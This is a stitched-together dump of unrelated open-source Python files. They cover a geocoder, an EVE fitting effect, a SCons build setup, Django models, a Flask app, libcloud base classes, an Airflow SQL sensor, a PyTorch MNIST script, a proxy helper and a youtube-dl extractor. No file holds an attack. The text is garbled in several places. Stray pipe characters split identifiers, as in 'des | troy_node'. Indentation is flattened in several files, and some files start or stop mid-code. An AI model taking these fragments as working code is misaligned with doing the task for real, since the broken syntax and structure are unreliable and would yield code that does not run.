:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
.. versionadded:: 0.97
"""
try:
lat, lon = [
x.strip() for x in
self._coerce_point_to_string(query).split(',')
] # doh
except ValueError:
raise ValueError("Must be a coordinate pair or Point")
params = {
'point.lat': lat,
'point.lon': lon,
'api_key': self.api_key,
}
url = "?".join((self.reverse_api, urlencode(params)))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(url, timeout=timeout), exactly_one
)
@staticmethod
def parse_code(feature):
"""
Parse each resource.
"""
latitude = feature.get('geometry', {}).get('coordinates', [])[1]
longitude = feature.get('geometry', {}).get('coordinates', [])[0]
        placename = feature.get('properties', {}).get('name')
        return Location(placename, (latitude, longitude), feature)
def _parse_json(self, response, exactly_one):
if response is None:
return None
features = response['features']
if not len(features):
return None
if exactly_one is True:
return self.parse_code(features[0])
else:
return [self.parse_code(feature) for feature in features]
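# Usage sketch (the API key is a placeholder):
#   geocoder = Mapzen(api_key='search-XXXXXX')
#   loc = geocoder.geocode('350 5th Ave, New York, NY')
#   back = geocoder.reverse('40.748, -73.985')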
Ebag333/Pyfa | eos/effects/sensorcompensationsensorstrengthbonusradar.py | Python | gpl-3.0 | 270 | 0.003704 | # sensorCompensationSensorStrengthBonusRadar
#
# Used by:
# Skill: Radar Sensor Compensation
type = "passive"
def handler(fit, container, context):
    fit.ship.boostItemAttr("scanRadarStrength", container.getModifiedItemAttr("sensorStrengthBonus") * container.level)
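    # boostItemAttr applies a percentage boost, so e.g. a 5-per-level
    # sensorStrengthBonus at skill level 4 raises scanRadarStrength by 20%
    # (the bonus value here is an assumption for illustration).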
ATNF/askapsdp | Tools/scons_tools/askapenv.py | Python | gpl-2.0 | 4,699 | 0.005746 | # Copyright (c) 2009 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License,
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os
from SCons.Environment import Environment
from SCons.Variables import Variables, BoolVariable
from SCons.Script import ARGUMENTS
# Returns true if the environment has "modules" support
def has_environment_modules():
return os.environ.has_key("MODULESHOME")
# Does the platform have MPI capability that can be used explicitly
# by using the mpicc * mpicxx compiler wrappers?
def has_explicit_mpi(env):
return env.Detect("mpicc") and env.Detect("mpicxx")
# Some platforms have MPI support which must be explicitly setup.
# That is the mpicc/mpicxx compiler wrappers need to be used explicitly
# Others, such as the Cray environment have MPI support already wrapped
# in the CC & CXX commands
def has_implicit_mpi():
return os.environ.has_key("CRAYOS_VERSION")
# This is always needed as it defines the ASKAP scons environment
askaptoolpath = os.path.join(os.environ['ASKAP_ROOT'], 'share', 'scons_tools')
# The build environment.
env = Environment(ENV = { 'PATH' : os.environ[ 'PATH' ],
'HOME' : os.environ[ 'HOME' ] },
toolpath = [askaptoolpath],
                  tools = ['default', 'askap_package', 'doxybuilder',
'functestbuilder', 'icebuilder', 'cloptions' ]
)
# Importing TERM allows programs (such as clang) to produce colour output
# if the terminal supports it
if 'TERM' in os.environ:
env['ENV']['TERM'] = os.environ['TERM']
opts = Variables('sconsopts.cfg', ARGUMENTS)
opts.Add(BoolVariable("nompi", "Disable MPI", False))
opts.Add(BoolVariable("openmp", "Use OpenMP", False))
opts.Add(BoolVariable("update", "svn update?", False))
opts.Update(env)
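# A sconsopts.cfg overriding these defaults might look like (illustrative):
#   nompi = 1
#   openmp = 1
#   update = 0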
# Standard compiler flags
env.AppendUnique(CCFLAGS=['-Wall'])
env.AppendUnique(CCFLAGS=['-O2'])
env.AppendUnique(CCFLAGS=['-g'])
env.AppendUnique(CCFLAGS=['-DASKAP_DEBUG'])
# If the system has environment modules support we need to import
# the whole environment
if has_environment_modules():
env["ENV"] = os.environ
# Support setting of "RBUILD_NOMPI" in the environment, because forgetting
# to pass nompi=1 on the command line is a common error
if os.environ.has_key('RBUILD_NOMPI') and os.environ['RBUILD_NOMPI'] == '1':
print "info: RBUILD_NOMPI=1 found in env, building without MPI support"
env['nompi'] = 1
# Setup MPI support
if has_implicit_mpi():
if env['nompi']:
print "error: Cannot disable MPI on this platform"
env.Exit(1)
env.AppendUnique(CPPFLAGS=['-DHAVE_MPI'])
if not env['nompi'] and not has_implicit_mpi():
if has_explicit_mpi(env):
env["CC"] = "mpicc"
env["CXX"] = "mpicxx"
env["LINK"] = "mpicxx"
env["SHLINK"] = "mpicxx"
env.AppendUnique(CPPFLAGS=['-DHAVE_MPI'])
else:
print "warn: No MPI support detected, compiling without"
# Setup OpenMP support
if env['openmp']:
env.AppendUnique(CCFLAGS=['-fopenmp'])
env.AppendUnique(LINKFLAGS=['-fopenmp'])
# Overwrite for Cray, need to use the standard compiler wrappers
# By default gcc/g++ are used
if os.environ.has_key("CRAYOS_VERSION"):
env["ENV"] = os.environ
env["CC"] = "cc"
env["CXX"] = "CC"
env["LINK"] = "CC"
env["SHLINK"] = "CC"
env.AppendUnique(LINKFLAGS=['-dynamic'])
# use global environment definitions
ASKAP_ROOT = os.getenv('ASKAP_ROOT')
envfiles = ['%s/env.default' % ASKAP_ROOT,]
for e in envfiles:
if os.path.exists(e):
print("askapenv: processing environment file: %s" % e)
opts = []
for line in open(e, "r"):
line = line.strip()
if line and not line.startswith("#"):
(k, v) = line.split('=')
env[k] = v
andrewebdev/django-ostinato | ostinato/tests/statemachine/models.py | Python | mit | 509 | 0.001965 | from django.db import models
from .workflow import TestStateMachine
class TestModel(models.Model):
name = models.CharField(max_length=100)
state = models.CharField(max_length=20, null=True, blank=True)
state_num = models.IntegerField(null=True, blank=True)
other_state = models.CharField(max_length=20, null=True, blank=True)
    message = models.CharField(max_length=250, null=True, blank=True)
class Meta:
permissions = TestStateMachine.get_permissions('testmodel', 'Test')
simonjpartridge/byeBias | main.py | Python | apache-2.0 | 644 | 0.003106 | from flask import Flask
app = Flask(__name__)
app.config['DEBUG'] = True
from scraper import default
from scraper import articleProcess
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
@app.route('/')
def hello():
"""Return a friendly HTTP greeting."""
return 'Hello World!'
@app.route('/processArticle')
def lala():
return articleProcess.processArticle()
@app.route('/defa')
def fghrghfh():
return default.return_yo()
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, nothing at this URL.', 404
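# For local testing outside App Engine, one could add (sketch):
#   if __name__ == '__main__':
#       app.run(host='127.0.0.1', port=8080)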
ema/conpaas | conpaas-services/contrib/libcloud/compute/base.py | Python | bsd-3-clause | 33,322 | 0 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provides base classes for working with drivers
"""
import sys
import time
import hashlib
import os
import socket
import struct
import binascii
from libcloud.utils.py3 import b
import libcloud.compute.ssh
from libcloud.pricing import get_size_price
from libcloud.compute.types import NodeState, DeploymentError
from libcloud.compute.ssh import SSHClient
# @@TR: are the imports below part of the public api for this
# module? They aren't used in here ...
from libcloud.common.base import ConnectionKey, ConnectionUserAndKey
from libcloud.common.base import BaseDriver
from libcloud.httplib_ssl import LibcloudHTTPSConnection
from libcloud.common.base import LibcloudHTTPConnection
from libcloud.common.types import LibcloudError
# How long to wait for the node to come online after creating it
NODE_ONLINE_WAIT_TIMEOUT = 10 * 60
# How long to try connecting to a remote SSH server when running a deployment
# script.
SSH_CONNECT_TIMEOUT = 5 * 60
__all__ = [
"Node",
"NodeState",
"NodeSize",
"NodeImage",
"NodeLocation",
"NodeAuthSSHKey",
"NodeAuthPassword",
"NodeDriver",
# @@TR: do the following need exporting?
"ConnectionKey",
"ConnectionUserAndKey",
"LibcloudHTTPSConnection",
"LibcloudHTTPConnection"
]
class UuidMixin(object):
"""
Mixin class for get_uuid function.
"""
def __init__(self):
self._uuid = None
def get_uuid(self):
"""Unique hash for a node, node image, or node size
@return: C{string}
The hash is a function of an SHA1 hash of the node, node image,
or node size's ID and its driver which means that it should be
unique between all objects of its type.
In some subclasses (e.g. GoGridNode) there is no ID
available so the public IP address is used. This means that,
unlike a properly done system UUID, the same UUID may mean a
different system install at a different time
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> node.get_uuid()
'd3748461511d8b9b0e0bfa0d4d3383a619a2bb9f'
Note, for example, that this example will always produce the
same UUID!
"""
if not self._uuid:
self._uuid = hashlib.sha1(b('%s:%s' %
(self.id, self.driver.type))).hexdigest()
return self._uuid
@property
def uuid(self):
return self.get_uuid()
class Node(UuidMixin):
"""
Provide a common interface for handling nodes of all types.
The Node object provides the interface in libcloud through which
we can manipulate nodes in different cloud providers in the same
way. Node objects don't actually do much directly themselves,
instead the node driver handles the connection to the node.
You don't normally create a node object yourself; instead you use
a driver and then have that create the node for you.
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> node.public_ips[0]
'127.0.0.3'
>>> node.name
'dummy-3'
You can also get nodes from the driver's list_node function.
>>> node = driver.list_nodes()[0]
>>> node.name
'dummy-1'
the node keeps a reference to its own driver which means that we
can work on nodes from different providers without having to know
which is which.
>>> driver = DummyNodeDriver(72)
>>> node2 = driver.create_node()
>>> node.driver.creds
0
>>> node2.driver.creds
72
    Although Node objects can be subclassed, this isn't normally
    done. Instead, any driver-specific information is stored in the
    "extra" property of the node.
>>> node.extra
{'foo': 'bar'}
"""
def __init__(self, id, name, state, public_ips, private_ips,
driver, size=None, image=None, extra=None):
self.id = str(id) if id else None
self.name = name
self.state = state
self.public_ips = public_ips if public_ips else []
self.private_ips = private_ips if private_ips else []
self.driver = driver
self.size = size
self.image = image
self.extra = extra or {}
UuidMixin.__init__(self)
    # Note: getters and setters below are here only for backward
# compatibility. They will be removed in the next release.
def _set_public_ips(self, value):
self.public_ips = value
def _get_public_ips(self):
return self.public_ips
def _set_private_ips(self, value):
self.private_ips = value
def _get_private_ips(self):
return self.private_ips
public_ip = property(fget=_get_public_ips, fset=_set_public_ips)
private_ip = property(fget=_get_private_ips, fset=_set_private_ips)
def reboot(self):
"""Reboot this node
@return: C{bool}
This calls the node's driver and reboots the node
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> node = driver.create_node()
>>> from libcloud.compute.types import NodeState
>>> node.state == NodeState.RUNNING
True
>>> node.state == NodeState.REBOOTING
False
>>> node.reboot()
True
>>> node.state == NodeState.REBOOTING
True
"""
return self.driver.reboot_node(self)
def destroy(self):
"""Destroy this node
@return: C{bool}
This calls the node's driver and destroys the node
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> from libcloud.compute.types import NodeState
>>> node = driver.create_node()
>>> node.state == NodeState.RUNNING
True
>>> node.destroy()
True
>>> node.state == NodeState.RUNNING
False
| """
return self.driver.des | troy_node(self)
def __repr__(self):
return (('<Node: uuid=%s, name=%s, state=%s, public_ips=%s, '
'provider=%s ...>')
% (self.uuid, self.name, self.state, self.public_ips,
self.driver.name))
class NodeSize(UuidMixin):
"""
A Base NodeSize class to derive from.
NodeSizes are objects which are typically returned a driver's
list_sizes function. They contain a number of different
parameters which define how big an image is.
The exact parameters available depends on the provider.
N.B. Where a parameter is "unlimited" (for example bandwidth in
Amazon) this will be given as 0.
>>> from libcloud.compute.drivers.dummy import DummyNodeDriver
>>> driver = DummyNodeDriver(0)
>>> size = driver.list_sizes()[0]
>>> size.ram
128
>>> size.bandwidth
500
>>> size.price
4
"""
def __init__(self, id, name, ram, disk, bandwidth, price, driver):
self.id = str(id)
self.name = name
self.ram = ram
self.disk = disk
self.bandwidth = bandwidth
self.price = price
self.driver = driver
UuidMixin.__init__(self)
def __repr__(self):
        return (('<NodeSize: id=%s, name=%s, ram=%s disk=%s bandwidth=%s '
                 'price=%s driver=%s ...>')
                % (self.id, self.name, self.ram, self.disk, self.bandwidth,
                   self.price, self.driver.name))
Fokko/incubator-airflow | airflow/sensors/sql_sensor.py | Python | apache-2.0 | 4,819 | 0.003528 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Iterable
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class SqlSensor(BaseSensorOperator):
"""
    Runs a SQL statement repeatedly until a criterion is met. It will keep trying until
success or failure criteria are met, or if the first cell is not in (0, '0', '', None).
Optional success and failure callables are called with the first cell returned as the argument.
If success callable is defined the sensor will keep retrying until the criteria is met.
If failure callable is defined and the criteria is met the sensor will raise AirflowException.
Failure criteria is evaluated before success criteria. A fail_on_empty boolean can also
be passed to the sensor in which case it will fail if no rows have been returned
:param conn_id: The connection to run the sensor against
:type conn_id: str
:param sql: The sql to run. To pass, it needs to return at least one cell
that contains a non-zero / empty string value.
:type sql: str
:param parameters: The parameters to render the SQL query with (optional).
:type parameters: mapping or iterable
:param success: Success criteria for the sensor is a Callable that takes first_cell
as the only argument, and returns a boolean (optional).
:type: success: Optional<Callable[[Any], bool]>
    :param failure: Failure criteria for the sensor is a Callable that takes first_cell
        as the only argument and returns a boolean (optional).
    :type: failure: Optional<Callable[[Any], bool]>
:param fail_on_empty: Explicitly fail on no rows returned.
:type: fail_on_empty: bool
"""
template_fields = ('sql',) # type: Iterable[str]
template_ext = ('.hql', '.sql',) # type: Iterable[str]
ui_color = '#7c7287'
@apply_defaults
def __init__(self, conn_id, sql, parameters=None, success=None, failure=None, fail_on_empty=False,
*args, **kwargs):
self.conn_id = conn_id
self.sql = sql
self.parameters = parameters
self.success = success
self.failure = failure
self.fail_on_empty = fail_on_empty
super().__init__(*args, **kwargs)
def _get_hook(self):
conn = BaseHook.get_connection(self.conn_id)
allowed_conn_type = {'google_cloud_platform', 'jdbc', 'mssql',
'mysql', 'oracle', 'postgres',
'presto', 'sqlite', 'vertica'}
if conn.conn_type not in allowed_conn_type:
raise AirflowException("The connection type is not supported by SqlSensor. " +
"Supported connection types: {}".format(list(allowed_conn_type)))
return conn.get_hook()
def poke(self, context):
hook = self._get_hook()
self.log.info('Poking: %s (with parameters %s)', self.sql, self.parameters)
records = hook.get_records(self.sql, self.parameters)
if not records:
if self.fail_on_empty:
raise AirflowException("No rows returned, raising as per fail_on_empty flag")
else:
return False
first_cell = records[0][0]
if self.failure is not None:
if callable(self.failure):
if self.failure(first_cell):
raise AirflowException(
"Failure criteria met. self.failure({}) returned True".format(first_cell))
else:
raise AirflowException("self.failure is present, but not callable -> {}".format(self.success))
if self.success is not None:
if callable(self.success):
return self.success(first_cell)
else:
raise AirflowException("self.success is present, but not callable -> {}".format(self.success))
return bool(first_cell)
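# Usage sketch in a DAG (connection id, SQL, and threshold are illustrative):
#   wait_for_data = SqlSensor(
#       task_id='wait_for_data',
#       conn_id='my_postgres',
#       sql="SELECT COUNT(*) FROM staging.events WHERE ds = '{{ ds }}'",
#       success=lambda cnt: cnt > 0,
#       dag=dag)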
Lucasfeelix/ong-joao-de-barro | users/migrations/0001_initial.py | Python | mit | 2,597 | 0.004667 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-06-21 04:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Donors',
            fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
                ('modified_at', models.DateTimeField(auto_now=True, verbose_name='Modificado em')),
('address', models.CharField(blank=True, max_length=100, verbose_name='Endereço')),
('number', models.IntegerField(verbose_name='Número')),
('complement', models.CharField(blank=True, max_length=100, verbose_name='Complemento')),
('neighborhood', models.CharField(blank=True, max_length=100, verbose_name='Bairro')),
('city', models.CharField(blank=True, max_length=100, verbose_name='Cidade')),
('state', models.CharField(blank=True, choices=[('Acre', 'Acre'), ('Alagoas', 'Alagoas'), ('Amazonas', 'Amazonas'), ('Amapá', 'Amapá'), ('Bahia', 'Bahia'), ('Ceará', 'Ceará'), ('Brasília', 'Brasília'), ('Espírito Santo', 'Espírito Santo'), ('Goiás', 'Goiás'), ('Maranhão', 'Maranhão'), ('Minas Gerais', 'Minas Gerais'), ('Mato Grosso do Sul', 'Mato Grosso do Sul'), ('Mato Grosso', 'Mato Grosso'), ('Pará', 'Pará'), ('Paraíba', 'Paraíba'), ('Pernambuco', 'Pernambuco'), ('Piauí', 'Piauí'), ('Paraná', 'Paraná'), ('Rio de Janeiro', 'Rio de Janeiro'), ('Rio Grande do Norte', 'Rio Grande do Norte'), ('Rondônia', 'Rondônia'), ('Roraima', 'Roraima'), ('Rio Grande do Sul', 'Rio Grande do Sul'), ('Santa Catarina', 'Santa Catarina'), ('Sergipe', 'Sergipe'), ('São Paulo', 'São Paulo'), ('Tocantins', 'Tocantins')], max_length=16, verbose_name='Estado')),
('cep', models.CharField(blank=True, max_length=8, verbose_name='CEP')),
('name', models.CharField(blank=True, max_length=100, verbose_name='Nome')),
('slug', models.SlugField(default='', max_length=100, verbose_name='Identificador')),
('is_active', models.BooleanField(default=True, verbose_name='Ativo')),
],
options={
'verbose_name': 'Doador',
'verbose_name_plural': 'Doadores',
'ordering': ['name'],
},
),
]
chuckbasstan123/pyTorch_project | mnist/main.py | Python | bsd-3-clause | 4,528 | 0.001767 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=args.batch_size, shuffle=True, **kwargs)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
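        # Two conv(kernel=5) + max-pool(2) stages shrink a 28x28 MNIST input
        # to 20 channels of 4x4, hence the flatten to 320 features below.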
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = F.relu(self.fc2(x))
return F.log_softmax(x)
model = Net()
if args.cuda:
model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
        loss = F.nll_loss(output, target)
| loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
def test(epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data, volatile=True), Variable(target)
output = model(data)
test_loss += F.nll_loss(output, target).data[0]
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum()
    test_loss /= len(test_loader)  # loss function already averages over batch size
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
for epoch in range(1, args.epochs + 1):
train(epoch)
test(epoch)
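# Example invocations (assuming this file is saved as main.py and torchvision
# can download MNIST into ../data):
#   python main.py --batch-size 64 --epochs 10 --lr 0.01
#   python main.py --no-cuda --log-interval 50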
|
h3llrais3r/Auto-Subliminal | autosubliminal/providers/proxy.py | Python | gpl-3.0 | 1,013 | 0.000987 | from urllib.parse import urlparse
class Proxy(object):
def __init__(self, proxy_type, proxy_address, proxy_port, proxy_login, proxy_password):
self.proxyType = proxy_type
self.proxyAddress = proxy_address
self.proxyPort = proxy_port
self.proxyLogin = proxy_login
self.proxyPassword = proxy_password
def serialize(self):
        result = {'proxyType': self.proxyType,
'proxyAddress': self.proxyAddress,
'proxyPort': self.proxyPort}
if self.proxyLogin or self.proxyPassword:
result['proxyLogin'] = self.proxyLogin
result['proxyPassword'] = self.proxyPassword
        return result
@classmethod
def parse_url(cls, url):
parsed = urlparse(url)
return cls(proxy_type=parsed.scheme,
proxy_address=parsed.hostname,
proxy_port=parsed.port,
proxy_login=parsed.username,
proxy_password=parsed.password)
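# Illustrative usage of the class above (hypothetical values):
#   Proxy.parse_url('http://user:secret@127.0.0.1:8080').serialize()
#   # -> {'proxyType': 'http', 'proxyAddress': '127.0.0.1', 'proxyPort': 8080,
#   #     'proxyLogin': 'user', 'proxyPassword': 'secret'}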
|
svagionitis/youtube-dl | youtube_dl/extractor/comedycentral.py | Python | unlicense | 9,941 | 0.003018 | from __future__ import unicode_literals
import re
from .mtv import MTVServicesInfoExtractor
from ..utils import (
compat_str,
compat_urllib_parse,
ExtractorError,
float_or_none,
unified_strdate,
)
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|full-episodes)
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TEST = {
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|Greg Fitzsimmons: Life on Stage|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
},
}
class ComedyCentralShowsIE(MTVServicesInfoExtractor):
IE_DESC = 'The Daily Show / The Colbert Report'
# urls can be abbreviations like :thedailyshow or :colbert
# urls for episodes like:
# or urls for clips like: http://www.thedailyshow.com/watch/mon-december-10-2012/any-given-gun-day
# or: http://www.colbertnation.com/the-colbert-report-videos/421667/november-29-2012/moon-shattering-news
# or: http://www.colbertnation.com/the-colbert-report-collections/422008/festival-of-lights/79524
_VALID_URL = r'''(?x)^(:(?P<shortname>tds|thedailyshow|cr|colbert|colbertnation|colbertreport)
                         |https?://(?:www\.)?
(?P<showname>thedailyshow|thecolbertreport)\.(?:cc\.)?com/
((?:full-)?episodes/(?:[0-9a-z]{6}/)?(?P<episode>.*)|
(?P<clip>
(?:(?:guests/[^/]+|videos|video-playlists|special-editions|news-team/[^/]+)/[^/]+/(?P<videotitle>[^/?#]+))
|(the-colbert-report-(videos|collections)/(?P<clipID>[0-9]+)/[^/]*/(?P<cntitle>.*?))
|(watch/(?P<date>[^/]*)/(?P<tdstitle>.*))
)|
(?P<interview>
extended-interviews/(?P<interID>[0-9a-z]+)/(?:playlist_tds_extended_)?(?P<interview_title>.*?)(/.*?)?)))
(?:[?#].*|$)'''
_TESTS = [{
'url': 'http://thedailyshow.cc.com/watch/thu-december-13-2012/kristen-stewart',
'md5': '4e2f5cb088a83cd8cdb7756132f9739d',
'info_dict': {
'id': 'ab9ab3e7-5a98-4dbe-8b21-551dc0523d55',
'ext': 'mp4',
'upload_date': '20121213',
'description': 'Kristen Stewart learns to let loose in "On the Road."',
'uploader': 'thedailyshow',
'title': 'thedailyshow kristen-stewart part 1',
}
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/xm3fnq/andrew-napolitano-extended-interview',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1?xrs=eml_col_031114',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/guests/michael-lewis/3efna8/exclusive---michael-lewis-extended-interview-pt--3',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/episodes/sy7yv0/april-8--2014---denis-leary',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/episodes/8ase07/april-8--2014---jane-goodall',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/npde3s/the-daily-show-19088-highlights',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/special-editions/2l8fdb/special-edition---a-look-back-at-food',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/news-team/michael-che/7wnfel/we-need-to-talk-about-israel',
'only_matching': True,
}]
_available_formats = ['3500', '2200', '1700', '1200', '750', '400']
_video_extensions = {
'3500': 'mp4',
'2200': 'mp4',
'1700': 'mp4',
'1200': 'mp4',
'750': 'mp4',
'400': 'mp4',
}
_video_dimensions = {
'3500': (1280, 720),
'2200': (960, 540),
'1700': (768, 432),
'1200': (640, 360),
'750': (512, 288),
'400': (384, 216),
}
    def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
if mobj.group('shortname'):
if mobj.group('shortname') in ('tds', 'thedailyshow'):
url = 'http://thedailyshow.cc.com/full-episodes/'
else:
                url = 'http://thecolbertreport.cc.com/full-episodes/'
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
assert mobj is not None
if mobj.group('clip'):
if mobj.group('videotitle'):
epTitle = mobj.group('videotitle')
elif mobj.group('showname') == 'thedailyshow':
epTitle = mobj.group('tdstitle')
else:
epTitle = mobj.group('cntitle')
dlNewest = False
elif mobj.group('interview'):
epTitle = mobj.group('interview_title')
dlNewest = False
else:
dlNewest = not mobj.group('episode')
if dlNewest:
epTitle = mobj.group('showname')
else:
epTitle = mobj.group('episode')
show_name = mobj.group('showname')
webpage, htmlHandle = self._download_webpage_handle(url, epTitle)
if dlNewest:
url = htmlHandle.geturl()
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid redirected URL: ' + url)
if mobj.group('episode') == '':
raise ExtractorError('Redirected URL is still not specific: ' + url)
epTitle = (mobj.group('episode') or mobj.group('videotitle')).rpartition('/')[-1]
mMovieParams = re.findall('(?:<param name="movie" value="|var url = ")(http://media.mtvnservices.com/([^"]*(?:episode|video).*?:.*?))"', webpage)
if len(mMovieParams) == 0:
            # The Colbert Report embeds the information in a data-mgid attribute
            # without a URL prefix; so extract the alternate reference
            # and then add the URL prefix manually.
altMovieParams = re.findall('data-mgid="([^"]*(?:episode|video|playlist).*?:.*?)"', webpage)
if len(altMovieParams) == 0:
raise ExtractorError('unable to find Flash URL in webpage ' + url)
else:
mMovieParams = [("http://media.mtvnservices.com/" + altMovieParams[0], altMovieParams[0])]
uri = mMovieParams[0][1]
# Correct cc.com in uri
